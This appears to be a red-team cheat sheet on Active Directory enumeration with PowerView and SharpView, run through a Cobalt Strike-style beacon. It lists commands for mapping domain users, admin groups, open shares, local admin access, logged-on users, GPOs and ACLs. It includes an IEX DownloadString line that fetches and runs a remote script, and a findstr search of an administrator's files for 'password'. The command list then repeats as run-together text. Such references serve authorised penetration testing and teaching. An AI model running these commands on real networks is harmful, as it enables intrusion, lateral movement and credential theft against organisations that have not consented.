PowerView

Enumeration

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');

# Domain Info
Get-Domain
Get-DomainController

# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess

# Enumerate Domain Users
Get-DomainUser | select samaccountname

# Enumerate Domain Users Properties
Get-DomainUser -Properties description,pwnlastset

# Get Detailed Information About Specific Domain User
Get-DomainUser -Identity user1

# Enumerate Domain Groups
Get-DomainGroup | select samaccountname

# Get Domain Groups That Contains The Word "admin".
Get-DomainGroup *admin* | select samaccountname

# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Emumerate Domain Computers That Respond To Ping Request
Get-DomainComputer -Ping | select cn

# Enumerate Domain OUs
Get-DomainOU | select name

# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"

# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass

# Enumerate User Groups
Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberof

Open Shares

# Enumerate Open Shares
Get-NetShare -ComputerName WorkStation1

# Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare)
Find-DomainShare

# Enumerate Open Shares That You Have Read Access
Find-DomainShare -CheckShareAccess

# Search on Interesting Files Inside Shares
Find-InterestingFile -Path \\workstation1\c$\

# Search on Interesting Keywords Inside Files on Shares
findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt

# Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile)
Find-InterestingDomainShareFile -Verbose

Local Groups

# Enumerate Local Groups on Computer WorkStation1
Get-NetLocalGroup –ComputerName WorkStation1

# Enumerate Local Group Members Of Administrators Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators"

# Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users"

# Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember)
Find-DomainLocalGroupMember -GroupName "Administrators"

Local Admin Access

# Test Admin Access Rights on a Computer
Test-AdminAccess -ComputerName workstation1

# Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess)
Find-LocalAdminAccess -Verbose

User Hunting

# Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc)
Get-NetSession -ComputerName WorkStation1

# Enumerate LoggedOn Users
Get-NetLoggedon -ComputerName workstation1

# Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Comparing The Result
Find-DomainUserLocation

# Perform Against Highly Traffic Servers (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainControlle)
Find-DomainUserLocation -Stealth

# Run Get-NetSession/Get-NetLoggedon on Every Domain Computer Then Printing All The Result
Find-DomainUserLocation -ShowAll

# Perform Against Different Users or Groups
Find-DomainUserLocation -UserGroupIdentity "local_admin"
Find-DomainUserLocation -UserIdentity "ITSupport"

Domain Group Policy

# Enumerate All Domain Group Policies
Get-DomainGPO | select DisplayName
Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName

# Enumerate All Domain Group Policies Applied To This Computer
Get-DomainGPO -ComputerName WorkStation1

# Enumerate Local Admin Access Through Domain Group Policies
# Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml
Get-DomainGPOLocalGroup -Verbose

Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName

ACL

# Enumerate All The Domain ACLs For Non BuiltIn Users With Modification Access
Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN

SharpView

https://github.com/tevora-threat/SharpView

beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-Domain

PreviousDomain Reconnaissance NextBloodHound

Last updated 2 years ago

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1 # PowerView IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1'); # Domain Info Get-Domain Get-DomainController # Password Policy (Get-DomainPolicy)."SystemAccess" Get-DomainPolicyData | select -ExpandProperty SystemAccess # Enumerate Domain Users Get-DomainUser | select samaccountname # Enumerate Domain Users Properties Get-DomainUser -Properties description,pwnlastset # Get Detailed Information About Specific Domain User Get-DomainUser -Identity user1 # Enumerate Domain Groups Get-DomainGroup | select samaccountname # Get Domain Groups That Contains The Word "admin". Get-DomainGroup *admin* | select samaccountname # Enumerate Domain Computers Get-DomainComputer | select cn Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName # Emumerate Domain Computers That Respond To Ping Request Get-DomainComputer -Ping | select cn # Enumerate Domain OUs Get-DomainOU | select name # Enumerate Domain Group Members Get-DomainGroupMember -Identity "Domain Admins" # Enumerate Nested Group Members (Recursive) Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass # Enumerate User Groups Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberof

# Enumerate Open Shares Get-NetShare -ComputerName WorkStation1 # Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare) Find-DomainShare # Enumerate Open Shares That You Have Read Access Find-DomainShare -CheckShareAccess # Search on Interesting Files Inside Shares Find-InterestingFile -Path \\workstation1\c$\ # Search on Interesting Keywords Inside Files on Shares findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt # Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile) Find-InterestingDomainShareFile -Verbose

# Enumerate Local Groups on Computer WorkStation1 Get-NetLocalGroup –ComputerName WorkStation1 # Enumerate Local Group Members Of Administrators Group on Computer WorkStation1 Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators" # Enumerate Local Group Members Of Remote Desktop Users Group on Computer WorkStation1 Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users" # Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember) Find-DomainLocalGroupMember -GroupName "Administrators"

# Test Admin Access Rights on a Computer Test-AdminAccess -ComputerName workstation1 # Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess) Find-LocalAdminAccess -Verbose

# Enumerate Users Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc) Get-NetSession -ComputerName WorkStation1 # Enumerate LoggedOn Users Get-NetLoggedon -ComputerName workstation1 # Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Comparing The Result Find-DomainUserLocation # Perform Against Highly Traffic Servers (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainControlle) Find-DomainUserLocation -Stealth # Run Get-NetSession/Get-NetLoggedon on Every Domain Computer Then Printing All The Result Find-DomainUserLocation -ShowAll # Perform Against Different Users or Groups Find-DomainUserLocation -UserGroupIdentity "local_admin" Find-DomainUserLocation -UserIdentity "ITSupport"

# Enumerate All Domain Group Policies Get-DomainGPO | select DisplayName Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName # Enumerate All Domain Group Policies Applied To This Computer Get-DomainGPO -ComputerName WorkStation1 # Enumerate Local Admin Access Through Domain Group Policies # Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml Get-DomainGPOLocalGroup -Verbose Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName